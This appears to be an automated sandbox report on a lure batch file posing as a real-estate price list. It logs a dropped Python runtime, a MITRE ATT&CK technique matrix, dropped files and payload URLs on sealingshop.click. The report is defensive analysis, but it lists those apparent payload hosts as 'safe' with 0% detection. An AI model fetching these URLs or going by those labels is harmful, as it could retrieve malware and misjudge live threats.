Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\re.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\re.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\re.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\re.cpython-39.pyc.1294162039392 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\enum.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\enum.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\enum.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\enum.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\enum.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\enum.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\enum.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\enum.cpython-39.pyc.1294162041408 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\types.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\types.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\types.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\types.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\types.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\types.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\types.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\types.cpython-39.pyc.1294162042080 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_compile.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_compile.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\sre_compile.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\sre_compile.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_compile.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_compile.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_compile.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\sre_compile.cpython-39.pyc.1294161958448 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_parse.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_parse.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\sre_parse.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\sre_parse.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_parse.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_parse.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_parse.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\sre_parse.cpython-39.pyc.1294161957808 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_constants.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_constants.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\sre_constants.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\sre_constants.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_constants.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_constants.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sre_constants.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\sre_constants.cpython-39.pyc.1294163658160 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\functools.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\functools.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\functools.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\functools.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\functools.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\functools.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\functools.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\functools.cpython-39.pyc.1294162032944 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\collections\__pycache__\__init__.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\collections\__pycache__\__init__.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\collections\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\collections\__pycache__\__init__.cpython-39.pyc.1294163473968 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\heapq.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\heapq.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\heapq.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\heapq.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\heapq.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\heapq.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\heapq.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\heapq.cpython-39.pyc.1294163422880 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\keyword.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\keyword.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\keyword.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\keyword.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\keyword.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\keyword.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\keyword.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\keyword.cpython-39.pyc.1294163422544 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\operator.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\operator.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\operator.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\operator.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\operator.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\operator.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\operator.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\operator.cpython-39.pyc.1294163474352 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\reprlib.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\reprlib.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\reprlib.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\reprlib.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\reprlib.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\reprlib.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\reprlib.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\reprlib.cpython-39.pyc.1294162309280 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\copyreg.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\copyreg.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\copyreg.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\copyreg.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\copyreg.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\copyreg.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\copyreg.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\copyreg.cpython-39.pyc.1294158332736 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\struct.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\struct.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\struct.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\struct.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\struct.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\struct.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\struct.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\struct.cpython-39.pyc.1294158332624 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\__init__.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\__pycache__\__init__.cpython-39.pyc.1294163472944 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\dbapi2.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\dbapi2.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\dbapi2.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\dbapi2.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\dbapi2.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\sqlite3\__pycache__\dbapi2.cpython-39.pyc.1294163475760 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\DLLs VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\datetime.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\datetime.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\datetime.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\datetime.cpython-39.pyc VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\datetime.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\datetime.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\datetime.py VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__ VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\__pycache__\datetime.cpython-39.pyc.1294163475760 VolumeInformation
Source: C:\Users\Public\python39\python.exe	Queries volume information: C:\Users\Public\python39\Lib\collections VolumeInformation

Source: C:\Users\Public\python39\python.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	21 Windows Management Instrumentation	11 Scripting	11 Process Injection	11 Masquerading	OS Credential Dumping	31 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	51 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	Security Account Manager	51 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\Public\python39\DLLs\_asyncio.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_bz2.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_ctypes.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_ctypes_test.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_elementtree.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_hashlib.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_lzma.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_msi.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_overlapped.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_queue.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_socket.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_sqlite3.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_ssl.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_uuid.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\_zoneinfo.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\Public\python39\DLLs\libffi-7.dll	0%	ReversingLabs
C:\Users\Public\python39\DLLs\libssl-1_1.dll	0%	ReversingLabs
C:\Users\Public\python39\DLLs\pyexpat.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\select.pyd	0%	ReversingLabs
C:\Users\Public\python39\DLLs\sqlite3.dll	0%	ReversingLabs
C:\Users\Public\python39\DLLs\unicodedata.pyd	0%	ReversingLabs
C:\Users\Public\python39\Lib\__future__.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_aix_support.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_bootlocale.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_bootsubprocess.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_collections_abc.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_compression.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_markupbase.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_osx_support.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_py_abc.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_pyio.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_sitebuiltins.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_strptime.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_threading_local.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\_weakrefset.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\__init__.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\_aix.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\_endian.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\__init__.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\__main__.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_errno.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_find.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_frombuffer.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_funcptr.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_functions.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_incomplete.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_init.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_internals.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_keeprefs.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_libc.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_loading.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_macholib.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_memfunctions.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_numbers.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_objects.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_parameters.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_pep3118.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_pickling.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_pointers.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_prototypes.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_python_api.py	0%	ReversingLabs
C:\Users\Public\python39\Lib\ctypes\test\test_random_things.py	0%	ReversingLabs

Source	Detection	Scanner	Label
http://sealingshop.click	0%	Avira URL Cloud	safe
https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs454	0%	Avira URL Cloud	safe
http://cypherpunks.venona.com/date/1994/09/msg00420.html	0%	Avira URL Cloud	safe
https://sealingshop.click/py/rose_tien-oC:	0%	Avira URL Cloud	safe
